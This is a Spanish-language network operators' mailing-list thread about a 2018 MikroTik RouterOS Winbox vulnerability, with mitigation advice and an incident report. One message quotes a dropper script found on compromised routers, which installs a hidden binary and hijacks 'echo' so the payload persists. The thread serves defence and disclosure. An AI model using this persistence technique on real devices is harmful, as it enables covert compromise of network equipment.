[Lista ArNOG] Alerta seguridad Mikrotik
Jose Luis Gaspoz
gaspozj en is.com.ar
Mar Abr 24 08:35:43 ART 2018
Nosotros fuimos víctimas de esto hace unos 10 dias atrás (eso quiere decir que puede hacer bastante tiempo que está) en un CCR 1036 que no estaba lo suficientemente cerrado al exterior y fué exactamente de esa manera.... lo sospechoso es el tema que lo primero que hace (que aparece en el log) es “ip services changed by .....” y tiene que ser un script que lo corre porque el log tiene el mismo timestamp que el logueo vía Winbox.
No encontramos ningún cambio aparente en “ip services” (revisamos todo lo que se puede ver en un CCR).
Era de un cliente, por lo que se lo actualizó (SO y firmware), se cambiaron las pass y se cerro el equipo para cualquier servicio exterior y “en apariencia” esta funcionando normalmente (no tiene mucha exigencia por ser de un cliente).
OJO, no hay nada sospechoso, así que puede haber muchos infectados porque solo aparece eso en el log hasta que se sobreescribe..... salvo que esten logueando a un syslog.
Saludos
Ing. Jose Luis Gaspoz
Internet Services S.A.
Tel: 0342-4565118
Cel: 342-5008523
From: Carriers
Sent: Tuesday, April 24, 2018 7:06 AM
To: lista en arnog.com.ar ; lista en arnog.com.ar
Subject: Re: [Lista ArNOG] Alerta seguridad Mikrotik
Estimados ojo con esa versión yo tube un par de problemas se me iban los ping altisimos . al parecer hay cambios en el enrutamiento
En 24 de abril de 2018, en 06:46, Juan Pablo Orsi <juanpablo en internetlocal.com.ar> escribió:
En el día de hoy MikroTik ha publicado un alerta de seguridad sobre una vulnerabilidad en el RouterOS que afecta a todas las versiones desde la v6.29.
Según el alerta, indica que la vulnerabilidad ha sido descubierta por ellos mismos y que recomiendan actualizar ASAP (lo mas pronto posible).
La vulnerabilidad permite a una “herramienta especial” conectar al puerto del Winbox y poder solicitar la base de datos de los usuarios del sistema.
Para tomar una medida al respecto se recomienda:
a.. Actualizar a la v6.42.1 y v6.43rc4 *Con precaución(leer mas adelante)
b.. Cerrar el puerto del Winbox para el acceso publicomediante un address list y el firewall en el chain input
c.. Limitar el rango de IP permitidos en ip > service > winbox a las redes locales unicamente.
d.. Cambiar las contraseñas de los usuarios.
Es importante tener en cuentaque en las recientes versiones del RouterOS existe un nuevo esquema en el manejo del bridge, porque lo hay que tener ciertas precauciones al actualizar debido a que se han dado casos de actualizaciones fallidas en configuraciones que tienen bridge y utilizan el chip switch.
En caso de equipos que se encuentren en producción y no es posible actualizar rápidamente el sistema operativo, es mandatorio que se cierre el acceso del winbox y cambiar las contraseñas de los usuarios.
Por el momento no es posible conocer o detectar que el sistema ha sido vulnerado, por lo que también se recomienda aplicar el punto anterior.
https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255
ACTUALIZACION:
Algunos usuarios están reportan que detectan dos archivos dentro de files con el nombre de dnstest con contenido binario y save.sh con el siguiente contenido:
#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac
if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi
mkdir -p $dest
export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test
echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
El intento tiene el siguiente comportamiento:
Como se observa en la siguiente captura, el primer acceso es un intento fallido del winbox, por lo que se presume que tiene el acceso a la DB de usuarios. Luego el acceso es con el usuario con permisos full.
------------------------------------------------------------------------------Lista mailing listLista en arnog.com.arhttp://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
Libre de virus. www.avg.com
--------------------------------------------------------------------------------
_______________________________________________
Lista mailing list
Lista en arnog.com.ar
http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://mailmancabase.interdotnet.com.ar/pipermail/lista/attachments/20180424/9173b8ef/attachment-0001.html>
Más información sobre la lista de distribución Lista